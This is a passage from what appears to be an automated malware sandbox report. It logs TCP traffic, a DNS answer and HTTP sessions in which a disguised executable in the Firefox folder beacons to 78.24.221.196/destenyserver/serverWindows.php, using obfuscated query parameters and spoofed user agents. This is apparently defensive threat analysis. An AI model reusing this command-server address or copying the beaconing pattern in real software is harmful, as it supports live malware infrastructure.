                      Dec 11, 2024 20:47:18.259298086 CET4973680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.259779930 CET4974080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.379106998 CET804974078.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:18.379203081 CET4974080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.379348040 CET4974080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.379703999 CET804973678.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:18.379789114 CET4973680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.501638889 CET804974078.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:19.703536034 CET804974078.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:19.709464073 CET49742443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:19.709516048 CET4434974278.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:19.709584951 CET49742443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:19.713584900 CET49742443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:19.713601112 CET4434974278.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:19.724972010 CET49742443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:19.744051933 CET4974080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:19.767411947 CET4434974278.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:21.180526972 CET4434974278.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:21.180607080 CET49742443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:21.180632114 CET49742443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:21.936964035 CET4974080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:39.954155922 CET4974480192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:40.073599100 CET804974478.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:40.073729038 CET4974480192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:40.074011087 CET4974480192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:40.193589926 CET804974478.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:41.392961979 CET804974478.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:41.395659924 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:41.395700932 CET4434974578.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:41.395782948 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:41.399411917 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:41.399424076 CET4434974578.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:41.447118044 CET4974480192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:42.861780882 CET4434974578.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:42.861906052 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:42.865783930 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:42.865799904 CET4434974578.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:42.866525888 CET4434974578.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:42.915843010 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:42.934911013 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:42.935007095 CET4434974578.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:42.935070038 CET49745443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:42.935972929 CET4974480192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:42.936558962 CET4974680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:43.062578917 CET804974478.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:43.062647104 CET804974678.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:43.062716961 CET4974480192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:43.062769890 CET4974680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:43.072563887 CET4974680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:43.191893101 CET804974678.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:44.409931898 CET804974678.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:44.410722017 CET49747443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:44.410772085 CET4434974778.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:44.410840988 CET49747443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:44.411226034 CET49747443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:44.462821960 CET4974680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:47.050239086 CET4974680192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:04.920715094 CET4977080192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:05.040771961 CET804977078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:05.040844917 CET4977080192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:05.041300058 CET4977080192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:05.160541058 CET804977078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:06.374494076 CET804977078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:06.380815983 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:06.380878925 CET4434977178.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:06.380991936 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:06.384331942 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:06.384351969 CET4434977178.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:06.431658983 CET4977080192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.042334080 CET4434977178.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:08.042399883 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.044502974 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.044523954 CET4434977178.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:08.045277119 CET4434977178.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:08.087905884 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.091933966 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.092061043 CET4434977178.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:08.092133999 CET49771443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.092483044 CET4977080192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.092874050 CET4977780192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.216394901 CET804977778.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:08.216480970 CET4977780192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.216597080 CET4977780192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.216909885 CET804977078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:08.216960907 CET4977080192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:08.340939999 CET804977778.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:09.555376053 CET804977778.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:09.555932999 CET49783443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:09.556021929 CET4434978378.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:09.556076050 CET49783443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:09.560672045 CET4977780192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:29.101840973 CET4982980192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:29.221472979 CET804982978.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:29.221564054 CET4982980192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:29.221960068 CET4982980192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:29.341346979 CET804982978.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:30.543548107 CET804982978.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:30.546736956 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:30.546837091 CET4434983078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:30.546968937 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:30.550923109 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:30.550961018 CET4434983078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:30.587833881 CET4982980192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.004076958 CET4434983078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:32.004154921 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.005711079 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.005736113 CET4434983078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:32.006658077 CET4434983078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:32.056566000 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.071168900 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.071257114 CET4434983078.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:32.071305037 CET49830443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.071955919 CET4982980192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.072333097 CET4983680192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.288321018 CET804983678.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:32.288338900 CET804982978.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:32.288527012 CET4982980192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.288547993 CET4983680192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.288752079 CET4983680192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:32.409375906 CET804983678.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:33.608733892 CET804983678.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:33.610743999 CET49842443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:33.610790968 CET4434984278.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:33.610858917 CET49842443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:33.611104012 CET49842443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:33.611119986 CET4434984278.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:33.611710072 CET49842443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:33.631544113 CET4983680192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:33.655350924 CET4434984278.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:35.193337917 CET4434984278.24.221.196192.168.2.4
                      Dec 11, 2024 20:48:35.193403959 CET49842443192.168.2.478.24.221.196
                      Dec 11, 2024 20:48:35.193424940 CET49842443192.168.2.478.24.221.196

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Dec 11, 2024 20:47:16.106751919 CET1.1.1.1192.168.2.40xc07fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                      Dec 11, 2024 20:47:16.106751919 CET1.1.1.1192.168.2.40xc07fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • 78.24.221.196

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44973078.24.221.196807668C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:47:07.546973944 CET534OUTGET /destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb HTTP/1.1
                      Accept: */*
                      Content-Type: text/html
                      User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:47:08.890338898 CET651INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:47:08 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.44973278.24.221.196807668C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:47:10.574151993 CET534OUTGET /destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb HTTP/1.1
                      Accept: */*
                      Content-Type: text/html
                      User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:47:11.899104118 CET651INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:47:11 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&vggpOLXPYLvMf5H5IvGMGdLPHKjxIru=tNEyeb
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.44973678.24.221.196808028C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:47:15.274884939 CET574OUTGET /destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh HTTP/1.1
                      Accept: */*
                      Content-Type: text/html
                      User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:47:16.594121933 CET711INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:47:16 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.44974078.24.221.196808028C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:47:18.379348040 CET574OUTGET /destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh HTTP/1.1
                      Accept: */*
                      Content-Type: text/html
                      User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:47:19.703536034 CET711INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:47:19 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&GVg3eNytiKdZfKboUKsABV78Vpm=LNvI&8vbLsXfqHjPlc2GFh2Ml=0uYiiylthVZUwh
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.44974478.24.221.196804548C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:47:40.074011087 CET619OUTGET /destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD HTTP/1.1
                      Accept: */*
                      Content-Type: text/csv
                      User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586
                      Host: 78.24.221.196
                      Connection: Keep-Alive
                      Dec 11, 2024 20:47:41.392961979 CET737INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:47:41 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.44974678.24.221.196804548C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
                      Dec 11, 2024 20:47:43.072563887 CET595OUTGET /destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD HTTP/1.1
                      Accept: */*
                      Content-Type: text/csv
                      User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Xbox; Xbox One) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.10586
                      Host: 78.24.221.196
                      Dec 11, 2024 20:47:44.409931898 CET737INHTTP/1.1 301 Moved Permanently
                      Server: nginx/1.18.0
                      Date: Wed, 11 Dec 2024 19:47:44 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Location: https://78.24.221.196:443/destenyserver/serverWindows.php?2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD&2c16ab42a9ec431843e9303d0fd9b8ec=7387bad2ace27b916ae009433495f2b4&a5f9089893fb7f884e1a8d017251cf23=ANyEGM4IGMjJTY4UzY0YGMklDN5QzMyIjMlZ2Y1ImM4kjZ5UGMmlzM&2HZ9q3Kqhdvc=HxWTdGoYWEfis322&qzxbGmHcY383vAjWpdfQEC=l7fC3b8ARx2x6pDBKO1EMqflE6MD
                      Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.44977078.24.221.196807584C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      TimestampBytes transferredDirectionData
